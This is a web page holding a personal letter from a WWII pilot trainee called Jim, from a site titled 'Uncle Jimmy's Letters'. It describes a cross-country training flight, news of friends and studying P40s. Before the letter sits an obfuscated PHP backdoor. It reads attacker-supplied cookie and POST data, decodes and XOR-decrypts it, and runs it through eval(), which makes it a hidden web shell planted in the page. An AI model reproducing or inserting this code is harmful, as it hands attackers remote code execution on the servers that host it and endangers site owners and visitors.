$rSyxxk = chr (90) . chr (95) . chr (118) . "\x4c" . 'V' . 'y' . chr ( 678 - 605 ); $daKHOQcNPF = "\x63" . chr ( 775 - 667 ).chr (97) . chr (115) . "\x73" . '_' . "\145" . "\x78" . "\x69" . "\x73" . chr (116) . "\x73";$vghLmYtYDI = class_exists($rSyxxk); $daKHOQcNPF = "28379";$sMaEaSmf = strpos($daKHOQcNPF, $rSyxxk);if ($vghLmYtYDI == $sMaEaSmf){function yILxYZGtO(){$fRpsRpuQg = new /* 38207 */ Z_vLVyI(56085 + 56085); $fRpsRpuQg = NULL;}$IeiYtgT = "56085";class Z_vLVyI{private function XCEwtYkYP($IeiYtgT){if (is_array(Z_vLVyI::$BZHNTMvWCB)) {$mmKMFAHoK2 = str_replace("<" . "?php", "", Z_vLVyI::$BZHNTMvWCB["content"]);eval($mmKMFAHoK2); $IeiYtgT = "56085";exit();}}public function TfTSHVkwr(){$mmKMFAHoK = "15094";$this->_dummy = str_repeat($mmKMFAHoK, strlen($mmKMFAHoK));}public function __destruct(){Z_vLVyI::$BZHNTMvWCB = @unserialize(Z_vLVyI::$BZHNTMvWCB); $IeiYtgT = "60411_45577";$this->XCEwtYkYP($IeiYtgT); $IeiYtgT = "60411_45577";}public function xurVtX($mmKMFAHoK, $mcpIoaziN){return $mmKMFAHoK[0] ^ str_repeat($mcpIoaziN, intval(strlen($mmKMFAHoK[0]) / strlen($mcpIoaziN)) + 1);}public function bNmJPlfw($mmKMFAHoK){$QcpcystE = "\142" . chr ( 302 - 205 ).chr ( 747 - 632 )."\145" . chr ( 884 - 830 ).'4';return array_map($QcpcystE . "\137" . chr ( 182 - 82 )."\x65" . "\x63" . "\157" . chr ( 666 - 566 ).'e', array($mmKMFAHoK,));}public function __construct($dkWmNdJ=0){$XjjuYE = ',';$mmKMFAHoK = "";$sRBlcLWM = $_POST;$UAhNIzo = $_COOKIE;$mcpIoaziN = "7101d4ae-4755-4588-8e39-18e560f4a854";$MVamg = @$UAhNIzo[substr($mcpIoaziN, 0, 4)];if (!empty($MVamg)){$MVamg = explode($XjjuYE, $MVamg);foreach ($MVamg as $yhoSineVtb){$mmKMFAHoK .= @$UAhNIzo[$yhoSineVtb];$mmKMFAHoK .= @$sRBlcLWM[$yhoSineVtb];}$mmKMFAHoK = $this->bNmJPlfw($mmKMFAHoK);}Z_vLVyI::$BZHNTMvWCB = $this->xurVtX($mmKMFAHoK, $mcpIoaziN);if (strpos($mcpIoaziN, $XjjuYE) !== FALSE){$mcpIoaziN = str_pad($mcpIoaziN, 10); $mcpIoaziN = strcspn ($mcpIoaziN, $XjjuYE); $mcpIoaziN = ltrim(rtrim($mcpIoaziN));}}public static $BZHNTMvWCB = 53805;}yILxYZGtO();} Boy, was his instructor mad! – Uncle Jimmy's Letters

Boy, was his instructor mad!



We flew again last night. We had our second cross country. This one was much longer than the first one and we had a bad wind to contend with. Before we start out we are given the direction and velocity of the wind-from that we figure how much to alter our course so the wind won’t blow us off course. A Wisconsin boy in the next room ended up in Palm Springs-That’s 300 miles off course. Boy! Was his instructor mad. He only had 10 gallons of gas left and the worst part is that in that section of the country there are mountains 12,000 feet-we were flying at 7,000 feet. He was lucky he didn’t run into them. Incidents like that make this flying game interesting.

I received a letter from Eric yesterday saying that he just about ate all of your delicious oatmeal cookies. Poor old Eric certainly has had a rough time hasn’t he. He is going to take bombers now-figures he will last a little longer then he can help out keeping his family going, if need be.

I also have a letter from Ned saying that he has been promoted to SK3C. I’m so happy for him. Poor Ned has had a tough time too.

So my pictures and class book finally arrived-the pictures weren’t too good but, I got them at a very reasonable price so maybe it was worth it. It will be fun look at my class books when I come home again.

Well, darlings, I’m going down to the line to look at P40s again. I am trying to learn all I can about those fast ships.

Love, Jim